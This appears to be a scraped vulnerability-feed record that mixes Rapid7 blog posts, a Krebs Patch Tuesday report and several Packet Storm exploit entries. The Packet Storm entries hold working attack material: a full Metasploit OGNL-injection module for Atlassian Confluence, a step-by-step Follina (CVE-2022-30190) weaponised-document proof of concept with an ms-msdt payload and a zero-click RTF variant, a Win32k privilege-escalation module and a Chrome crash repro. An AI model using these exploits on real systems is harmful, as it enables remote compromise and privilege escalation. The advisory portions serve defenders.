one source in the generation of its user word list if both `USERNAME` and `USER_FILE` options were set. 
The module now pulls from all possible datastore options if they are set, including a new option `DB_ALL_USERS`.\n * [#16160](<https://github.com/rapid7/metasploit-framework/pull/16160>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a crash when `msfconsole` is unable to correctly determine the hostname and current user within a shell prompt.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.28...6.1.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-03T12%3A28%3A59%2B00%3A00..2022-02-09T14%3A46%3A38-06%3A00%22>)\n * [Full diff 6.1.28...6.1.29](<https://github.com/rapid7/metasploit-framework/compare/6.1.28...6.1.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2022-02-11T21:07:08", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2022-02-11T21:07:08", "id": "RAPID7BLOG:D214650E6EFB584624DA76ACB1573C1B", "href": "https://blog.rapid7.com/2022/02/11/metasploit-wrap-up-148/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-02T16:48:36", "description": "\n\nOn May 30, 2022, Microsoft Security Response Center (MSRC) [published a blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft\u2019s [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) on CVE-2022-30190 indicates that exploitation has been detected in the wild.\n\nAccording to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights. Workarounds are available in [Microsoft\u2019s blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nRapid7\u2019s vulnerability research team has a [full technical analysis of CVE-2022-30190 in AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis?referrer=blog>). 
The flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening or previewing an attachment, and appears to leverage a vector [described in 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>). Despite the label, it is not a true \u201cremote code execution\u201d vulnerability: the attacker still needs a user to open or preview a crafted document.\n\n## Mitigation guidance\n\nIn the absence of a patch, disable the MSDT URL protocol [as specified in Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30190 with an authenticated vulnerability check in the May 31 content release.\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:\n\n * Suspicious Process - Microsoft Office App Spawns MSDT.exe\n\nWe recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T15:15:16", "type": "rapid7blog", "title": "CVE-2022-30190: \"Follina\" Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T15:15:16", "id": "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "href": "https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": 
"https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ 
\nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, 
'').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}, {"lastseen": "2022-06-20T04:43:33", "description": "", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "packetstorm", "title": "Chrome CVE-2022-1096 Incomplete Fix", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1232"], "modified": "2022-06-20T00:00:00", "id": "PACKETSTORM:167516", "href": "https://packetstormsecurity.com/files/167516/Chrome-CVE-2022-1096-Incomplete-Fix.html", "sourceData": "`Chrome: Incomplete fix for CVE-2022-1096 \n \nVULNERABILITY DETAILS \nThe fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors. \n \nUnfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change. 
\n \n \nVERSION \nGoogle Chrome 100.0.4896.60 (Official Build) (arm64) \nChromium 102.0.4972.0 (Developer Build) (64-bit) \n \n \nREPRODUCTION CASE \nTo make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call: \n \n``` \n<script> \nstyle = document.createElement('p').style; \nObject.defineProperty(style, 'prop', { \nvalue: { toString() { style.prop = 1 } } \n}); \n</script> \n``` \n \nThe repro case above triggers the same DCHECK failure: \n \n``` \n# \n# Fatal error in ../../v8/src/objects/map.cc, line 437 \n# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found(). \n# \n``` \n \nCREDIT INFORMATION \nSergei Glazunov of Google Project Zero \n \n \nThis bug is subject to a 90-day disclosure deadline. If a fix for this \nissue is made available to users before the end of the 90-day deadline, \nthis bug report will become public 30 days after the fix was made \navailable. Otherwise, this bug report will become public at the deadline. \nThe scheduled deadline is 2022-06-28. \n \n \nRelated CVE Numbers: CVE-2022-1232,CVE-2022-1096. 
\n \n \n \nFound by: glazunov@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167516/GS20220620005024.txt"}, {"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Office RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on 
Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need for user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme \"ms-msdt:\" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). \n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. 
Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). \n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). \n \nWith RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. 
\n \n## Sources : \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}, {"lastseen": "2022-02-28T16:54:53", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166169", "href": "https://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: 
https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/local/cve_2021_1732_win32k' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n \nThis flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause \nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to \nfunction on a wider range of Windows 10 targets. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n# CVE-2021-1732 \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n# CVE-2022-21882 \n'L4ys', # github poc \n# both CVEs \n'KaLendsi', # github pocs \n# Metasploit exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n# CVE-2021-1732 references \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], \n# CVE-2022-21882 references \n[ 'CVE', '2022-21882' ], \n[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] \n], \n'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, 
], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) \nprint_error('The exploit only supports Windows 10 versions 1803 - 21H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166169/cve_2022_21882_win32k.rb.txt"}], "krebs": [{"lastseen": "2022-05-20T03:29:17", "description": "**Microsoft** today released updates to fix at least 74 separate security problems in its **Windows** operating systems and related software. 
This month's patch batch includes fixes for seven "critical" flaws, as well as a zero-day vulnerability that affects all supported versions of Windows.\n\n\n\nBy all accounts, the most urgent bug Microsoft addressed this month is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), a weakness in a central component of Windows security (the "**Local Security Authority**" process within Windows). CVE-2022-26925 was publicly disclosed prior to today, and Microsoft says it is now actively being exploited in the wild. The flaw affects Windows 7 through 10 and Windows Server 2008 through 2022.\n\n**Greg Wiseman**, product manager for **Rapid7**, said Microsoft has rated this vulnerability as important and assigned it a CVSS (danger) score of 8.1 (10 being the worst), although Microsoft notes that the CVSS score can be as high as 9.8 in certain situations.\n\n"This allows attackers to perform a man-in-the-middle attack to force domain controllers to authenticate to the attacker using NTLM authentication," Wiseman said. "This is very bad news when used in conjunction with an NTLM relay attack, potentially leading to remote code execution. 
This bug affects all supported versions of Windows, but Domain Controllers should be patched on a priority basis before updating other servers."\n\nWiseman said the most recent time Microsoft patched a similar vulnerability -- last August in [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) -- it was also being exploited in the wild under the name "[PetitPotam](<https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>)."\n\n"CVE-2021-36942 was so bad it made CISA\u2019s [catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)," Wiseman said.\n\nSeven of the flaws fixed today earned Microsoft's most-dire "critical" label, which it assigns to vulnerabilities that can be exploited by malware or miscreants to remotely compromise a vulnerable Windows system without any help from the user.\n\nAmong those is [CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>), which carries a CVSS score of 9.8, and affects services using the **Windows Network File System** (NFS). **Trend Micro's Zero Day Initiative** notes that this bug could allow remote, unauthenticated attackers to execute code in the context of the Network File System (NFS) service on affected systems.\n\n"NFS isn\u2019t on by default, but it\u2019s prevalent in environments where Windows systems are mixed with other OSes such as Linux or Unix," ZDI's **Dustin Childs** [wrote](<https://www.zerodayinitiative.com/blog/2022/5/10/the-may-2022-security-update-review>). "If this describes your environment, you should definitely test and deploy this patch quickly."\n\nOnce again, this month's Patch Tuesday is sponsored by **Windows Print Spooler**, a core Windows service that keeps spooling out the security hits. 
May's patches include four fixes for Print Spooler, including two information disclosure and two elevation of privilege flaws.\n\n"All of the flaws are rated as important, and two of the three are considered more likely to be exploited," said **Satnam Narang**, staff research engineer at **Tenable**. "Windows Print Spooler continues to remain a valuable target for attackers since [PrintNightmare was disclosed nearly a year ago](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>). Elevation of Privilege flaws in particular should be carefully prioritized, as we\u2019ve seen ransomware groups like Conti favor them as part of its playbook."\n\nOther Windows components that received patches this month include **.NET** and **Visual Studio**, **Microsoft Edge** (Chromium-based), **Microsoft Exchange Server**, **Office**, **Windows Hyper-V**, **Windows Authentication Methods**, **BitLocker**, **Remote Desktop Client**, and **Windows Point-to-Point Tunneling Protocol**.\n\nAlso today, 